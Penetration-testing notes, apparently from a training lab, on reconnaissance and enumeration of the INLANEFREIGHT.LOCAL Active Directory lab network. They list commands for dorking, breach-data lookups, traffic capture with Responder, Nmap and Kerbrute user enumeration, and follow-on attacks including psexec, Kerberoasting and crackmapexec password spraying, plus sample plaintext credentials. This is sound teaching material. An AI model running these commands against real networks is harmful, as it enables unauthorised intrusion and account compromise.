External and Internal Enumeration

There we will do an external reconnaissance and internal enumeration processes for assessing INLANEFREIGHT.LOCAL, LOGISTICS.INLANEFREIGHT.LOCAL, and FREIGHTLOGISTICS.LOCAL within the 172.16.5.0/23 network. Conducted from an unauthenticated Linux host (ea-attack01), the focus is on identifying hosts, services, users, and vulnerabilities to establish a foothold using passive and active techniques, adhering to grey-box scope.

External Reconnaissance

Purpose

• Validate scope (inlanefreight.com, 172.16.5.0/23).

• Identify public data (IPs, domains, credentials) for internal testing.

• Avoid out-of-scope interactions (e.g., https://www.inlanefreight.com).

Actions and Commands

Data Point	Tool/Command	Purpose
IP Scope	nslookup ns1.inlanefreight.com nslookup ns2.inlanefreight.com BGP Toolkit, ViewDNS.info	Validate IPs and hosting
Domains	dig inlanefreight.com ANY Google Dork: site:*.inlanefreight.com	Identify subdomains, services
Schema	Google Dork: intext:"@inlanefreight.com" linkedin2username -c Inlanefreight -o usernames.txt	Discover username format
Data Disclosures	Google Dork: filetype:pdf inurl:inlanefreight.com exiftool corporate_goals.pdf trufflehog github --org=inlanefreight	Find sensitive files/repos
Breach Data	h8mail -t emma.williams@inlanefreight.com -o output.csv dehashed.py -q inlanefreight.local -p	Identify leaked credentials

Internal Enumeration

Purpose

• Identify live hosts, services, and users in 172.16.5.0/23.

• Discover vulnerabilities and valid AD users for foothold attempts.

• Document findings for attacks (e.g., password spraying).

Passive Enumeration

Tool	Command	Purpose	Findings
Wireshark	sudo -E wireshark (filter ARP, MDNS on ens224)	Capture traffic	Hosts: 172.16.5.5, 172.16.5.25, 172.16.5.50, 172.16.5.100, 172.16.5.125; ACADEMY-EA-WEB01.local
tcpdump	sudo tcpdump -i ens224 -w initial_traffic.pcap	CLI traffic capture	Confirms ARP/MDNS traffic
Responder	sudo responder -I ens224 -A	Analyze LLMNR/NBT-NS	Additional hosts: 172.16.5.200, 172.16.5.225; ACADEMY-EA-DC01

Active Enumeration

Tool	Command	Purpose	Findings
fping	fping -asgq 172.16.5.0/23 > live_hosts.txt	Identify live hosts	9 hosts: 172.16.5.5, 172.16.5.25, etc.
Nmap	sudo nmap -v -A -iL live_hosts.txt -oN host-enum	Scan services/OS	172.16.5.5: DC (ACADEMY-EA-DC01), Kerberos, LDAP, SMB; 172.16.5.100: Server 2008 R2, MSSQL 2008 R2, weak SMBv2, HTTP TRACE
Kerbrute	kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users	Enumerate users	56 valid users (e.g., jjones, jhermann, wshepherd)

Potential Attack Vectors

Target	Command	Purpose
SYSTEM Access	psexec.py INLANEFREIGHT.LOCAL/user:password@172.16.5.100	Exploit Server 2008 R2 (EternalBlue, client approval needed)
AD Enumeration	sharphound.exe -c All Get-DomainUser	Use credentials for BloodHound/PowerView
Kerberoasting	GetUserSPNs.py INLANEFREIGHT.LOCAL/user:password@172.16.5.5 -request	Extract TGS tickets
Password Spraying	crackmapexec smb 172.16.5.0/23 -u valid_ad_users.txt -p 'Summer2025!'	Test common passwords

Notes

• Save outputs: initial_traffic.pcap, live_hosts.txt, host-enum.*, valid_ad_users.txt.

• Log findings (IPs, hostnames, users, vulnerabilities) in a notetaking tool.

• Validate vulnerabilities (e.g., 172.16.5.100) with client before exploitation.

• Use credentials (roger.grimes:Ilovefishing!, jane.yu:Starlight1982_!) for spraying or AD enumeration.